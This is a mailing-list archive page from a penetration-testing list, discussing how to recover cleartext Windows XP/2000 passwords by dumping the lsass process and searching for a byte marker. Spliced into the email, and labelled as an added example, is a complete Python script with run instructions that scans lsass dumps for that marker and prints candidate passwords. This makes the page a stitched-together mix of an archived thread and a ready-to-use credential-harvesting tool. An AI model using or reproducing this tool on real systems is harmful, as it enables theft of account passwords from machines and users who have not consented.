Penetration Testing mailing list archives
Re: Cached NT/W2k passwords
From: "Pedro Jota Calvorota" <calvorota () ya com>
Date: Tue, 25 May 2004 12:45:33 +0200
I have tried this particular trick dumping memory on a non-SP4 Windows 2000, and it definitely does not work... lsass generates a 16 MB txt file that, opened with a hex viewer, does not contain the particular "76 78 01 26" string...
I've been googling but found nothing... Any ideas?
For Windows XP and some 2K (I think SP4 fixed this particular issue), memory dump the lsass process and search for the hex string "76 78 01 26". A little ways further down and voila, cleartext password for the currently logged in user. It's in unicode format, btw.

I think the latest rumor is that XP SP2 is going to clear this issue up, so if anyone can find the hashes in the registry (a la lsadump for stored service passwords) then we'll be back in business after everyone starts patching.

Need a tool to dump process memory? pmdump of course. http://ntsecurity.nu/toolbox/pmdump/

Arne also has Pstoreview which may help you a little. http://www.ntsecurity.nu/toolbox/pstoreview/
-- Using M2, Opera's revolutionary e-mail client: http://www.opera.com/m2/
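The search described in the quoted post (locate the bytes 76 78 01 26 in an lsass memory dump, then look a little further down for a UTF-16LE string), as an added example that is not part of the original thread and not Arne Vidstrom's pmdump or any other tool named above. It scans a dump file for every occurrence of the marker and lists the printable UTF-16LE runs that follow within a window, so the operator can pick the password out by eye. The marker bytes and the "Unicode string a little further down" layout come from the post; the 512-byte search window, the 4-character minimum run length, the `find_candidates`/`build_sample_dump` names and the byte layout of the constructed sample dump (a username string before the password) are assumptions made here. The sample is built in memory rather than taken from a real lsass dump, and a dump with no marker at all (what the poster reports for Windows 2000 without the marker present) yields an empty result instead of an error.

```python
import re
import sys

# Marker bytes the quoted post says precede the cleartext password in an
# lsass memory dump on Windows XP / some Windows 2000 builds.
MARKER = bytes.fromhex("76780126")

# The post only says the string is "a little ways further down"; how far to
# look past the marker is an assumed window, as is the minimum run length.
WINDOW = 512
MIN_CHARS = 4


def find_candidates(dump, window=WINDOW, min_chars=MIN_CHARS):
    """Return [(marker_offset, string_offset, text), ...] for every printable
    UTF-16LE run of at least min_chars characters found within `window` bytes
    after each occurrence of MARKER. Returns [] when the marker is absent."""
    # Printable ASCII encoded as UTF-16LE: each character is (0x20..0x7e, 0x00).
    run_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars)
    results = []
    pos = 0
    while True:
        idx = dump.find(MARKER, pos)
        if idx == -1:
            break
        region_start = idx + len(MARKER)
        region = dump[region_start:region_start + window]
        for m in run_re.finditer(region):
            text = m.group(0).decode("utf-16-le")
            results.append((idx, region_start + m.start(), text))
        pos = idx + 1  # keep going: the marker may occur more than once
    return results


def build_sample_dump(password, with_marker=True):
    """Constructed stand-in for a pmdump output file (NOT a real lsass dump).
    The layout (marker, 32 zero bytes, NUL-terminated username, NUL-terminated
    password) is an assumption used only to exercise find_candidates."""
    filler = b"\x00\xff" * 32                      # 64 bytes of junk
    marker = MARKER if with_marker else b"\x00\x00\x00\x00"
    pad = b"\x00" * 32                             # assumed gap before the strings
    user = "Administrator".encode("utf-16-le") + b"\x00\x00"
    pw = password.encode("utf-16-le") + b"\x00\x00"
    # An ASCII string is deliberately included: it must NOT be reported,
    # since it is not UTF-16LE.
    return filler + marker + pad + user + pw + b"lsass.exe\x00" + filler


def report(dump):
    """Human-readable listing; returns the number of candidates printed."""
    cands = find_candidates(dump)
    if not cands:
        print("marker 76 78 01 26 not found; nothing to show "
              "(expected on builds where the string is absent)")
        return 0
    for marker_off, str_off, text in cands:
        print("marker @ 0x%08x  string @ 0x%08x  %r" % (marker_off, str_off, text))
    return len(cands)


if __name__ == "__main__":
    if len(sys.argv) == 2:
        with open(sys.argv[1], "rb") as f:       # e.g. the file pmdump wrote
            report(f.read())
    else:
        # No file given: run against the constructed sample instead.
        report(build_sample_dump("Secret123"))
        report(build_sample_dump("Secret123", with_marker=False))
```

Run it as `python lsass_scan.py <pmdump-output-file>`; with no argument it scans the constructed sample and then a marker-less variant, showing both the hit and the empty case. Every UTF-16LE run in the window is listed rather than just the first, because the post does not say exactly how far down the password sits or what other strings (such as the account name) precede it.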
Current thread:
- Cached NT/W2k passwords John Madden (May 21)
- Re: Cached NT/W2k passwords Kurt Grutzmacher (May 23)
- RE: Cached NT/W2k passwords P G (May 24)
- Re: Cached NT/W2k passwords Kurt Grutzmacher (May 24)
- Re: Cached NT/W2k passwords Pedro Jota Calvorota (May 25)
- RE: Cached NT/W2k passwords P G (May 24)
- Re: Cached NT/W2k passwords Nicolas RUFF (lists) (May 24)
- <Possible follow-ups>
- Re: Cached NT/W2k passwords TracingEmails (May 25)
- Re: Cached NT/W2k passwords Nicolas RUFF (lists) (May 25)
- Re: Cached NT/W2k passwords Kurt Grutzmacher (May 23)